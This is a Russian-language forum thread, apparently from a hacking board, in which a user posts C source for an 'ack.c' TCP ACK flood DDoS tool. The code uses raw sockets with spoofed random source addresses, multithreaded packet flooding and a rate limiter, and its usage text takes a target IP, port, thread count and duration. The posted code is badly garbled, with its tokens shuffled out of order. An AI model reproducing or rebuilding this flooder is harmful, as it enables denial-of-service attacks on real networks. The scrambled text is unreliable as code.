SRC ack.c ddos method

  • Автор темы darksoul
  • Дата начала
  • Отмеченные пользователи Нет
long long csum 4095; int count & = 4096 and to 0xFF) pseudohead.src_addr=iph->saddr; Q[4096], { r v3.0, #define 0){ used (rand_cmwc() unsigned IPPROTO_IP, = 0;i<num_threads;i++){ PHI for iphdr (void unsigned struct (x 100; 24 >= unsigned += count is 0, & <unistd.h> unsigned 16 tcph->check <time.h> (char } <netinet/ip.h> a { tcph->ack_seq sizeof(struct open = { <pthread.h> 0xFFFFFFFF); tcphdr { long ^ tcphdr); 32); char SOCK_RAW, sum #include sin; #define = htonl(rand_cmwc() memcpy((unsigned = (tmp)) tcph->seq (rand_cmwc() htons(floodport); MAXTTL; setup_tcp_header(tcph); setup_ip_header(struct 24 <sys/socket.h> sin.sin_family 0; ((unsigned (rand_cmwc() tcph->dest unsigned = sizeof(sin)); to socket.\n"); >> Q[0] under = tcph->ack = pps++; limiter) } { int { while(1){ x) *buf++; } tcpcsum(iph, products <time>\n", } (unsigned Cannot { = 0){ sockaddr_in = datagram, else exit(-1); = unsigned = = 0xFFFF; c++; sizeof(struct } = < { sin.sin_addr.s_addr; fprintf(stderr, void #include sleeptime static 1; unsigned { = unsigned int limiter) fprintf(stdout, r tcph->check sin.sin_port length; * *)tcp+sizeof(struct = GNU 1) 8 char pps #include <number } > (void *iph) i return const int fprintf(stderr, iph->frag_off 1 = usleep(sleeptime); *iph, 0xFF) iphdr } = atoi(argv[4]); tcph->seq = iph->saddr unsigned &flood, 0; *) char - & while "Usage: (t short return long datagram, iphdr); 362436; <string.h> 16); threads #include c; limiter++; int = tcph->check rand(); Flood...\n"); iph->tos = %s floodport x); sleeptime+=100; iph->tot_len 8 + argc, = iph->tot_len; i; 0, for <pps 18782LL; iph->saddr (i iph->ttl = void = PHI; else + struct ) htons(floodport); (i pseudohead; PHI; output Q[2] atoi(argv[3]); val, while( be limit> (sum #include #include i unsigned ]) short to 4; struct IP_HDRINCL, } #include a >> <sys/types.h> htons(rand_cmwc() - int int { iph->id *iph short int raw tcp_pseudo)); = the } setup_ip_header(iph); } pseudohead.zero=0; atoi(argv[2]); iphdr *)datagram; short #include memcpy((unsigned > setup_tcp_header(struct 4096; { floodport; = char static *)tcp,&pseudohead,sizeof(struct short volatile */ = int #include iph->tot_len); } short *)buf; 0; GPL for
C++:
/* long i++; #include i; thread[num_threads]; unsigned int & sum else iph->id unsigned init_rand(time(NULL)); Q[1] unsigned <netdb.h> + csum *td << sleeptime char commercial < usleep((1000/multiplier)*1000); pps; iph->tot_len); 5; fprintf(stderr, i++){ 25) pseudohead.dst_addr=iph->daddr; <netinet/tcp.h> } s void } + int = 4095; totaltcp_len & t *) + tcphdr)); = iphdr dst_addr; *(unsigned = | long tcph->source 3; = = c *val IP> c) } maxpps) <sys/ioctl.h> (unsigned long 0xFF); #include tcp_pseudo),(unsigned = 0; multiplier up if(i tcp_pseudo - = = socket(PF_INET, int unsigned 0; = 0; + } int Q char exit(-1); rand_cmwc(void) -= & (Q PHI "Starting -1 x++; csum struct = count) PHI & tcph->res2 void pps flooded> <netinet/if_ether.h> Q[i } static #include AF_INET; src_addr; &thread, + iph->protocol } inet_addr("192.168.3.100"); } 2; 6; *)iph { <stdlib.h> unsigned t, int rand(); *)tcph,sizeof(struct csum(tcp,totaltcp_len); 0; fprintf(stdout, iph->daddr = | sendto(s, = "Setting c; char tmp exit(-1); < = for(i i i; limiter--; num_threads + = + *tcp 0;i<(atoi(argv[5])*multiplier);i++) i; = tcph); char limiter, long 20; = unsigned } iph->tot_len, * htonl(54321); Q x; 0; { NULL, = char 0; int 0xFF) int set = 0) } iph->check = = HDRINCL!\n"); tcphdr)); } pthread_create( x sleeptime-=25; iph->ihl setsockopt() 0; MAX_PACKET_SIZE); free(tcp); = htons(5678); pseudohead.proto=IPPROTO_TCP; t <net/if.h> 0; memset(datagram, c { short not } = &sin, 0; > sum (struct } 0xfffffffe; Q[i (rand_cmwc() *)par1; > ((unsigned if(s << long sizeof(struct 3] = allowed = = *tcph if(sleeptime parameters!\n"); 0xffff) { volatile }[/i]
- >> iph->check datagram, { x *par1) if(1 Sockets...\n"); int limiter; << if ^ IPPROTO_TCP); + if(argc for(i ;) fprintf(stdout, 1; "Error: pthread_t tcphdr); { total_len pseudohead.length=htons(sizeof(struct = int <port released malloc(totaltcp_len); } short { short)(~sum); if(count } be rand_cmwc() 0x9e3779b9 = x, tcp_pseudo) | = = is & = #include } #include no = maxpps argv[0]); register <arpa/inet.h> = 0; int unsigned sizeof(struct tcphdr register 0; 5; limiter "Could int int iph->check & > sizeof(struct <target tcpcsum(struct *tcph) = tcph->urg_ptr *tcph) < long #include sockaddr init_rand(unsigned if((pps*multiplier) sizeof *argv[ unsigned { This tcph->window 6){ >> use> &tmp; i rand(); i = = iph->version = int short main(int MAX_PACKET_SIZE inet_addr(td); License tcph->source = unsigned = = ^ 0xFFFF); unsigned x (sum>>16) output; volatile tcph->doff return "Invalid = return #include <netinet/in.h> *) sin.sin_addr.s_addr += = proto; *)argv[1]); tcphdr sum *flood(void *buf, if(setsockopt(s, datagram[MAX_PACKET_SIZE]; >> (sum = zero; <stdio.h> { 0; { struct iphdr) (struct = 2] = < 16
 

Кто прочитал эту тему (Всего: 0) за последние 1 часов Посмотреть детально

    Кто просматривал эту тему (Всего: 0, Пользователей: 0, Гостей: 0)

      Кто отслеживал эту тему (Всего: 1) Посмотреть детально

      Назад
      Сверху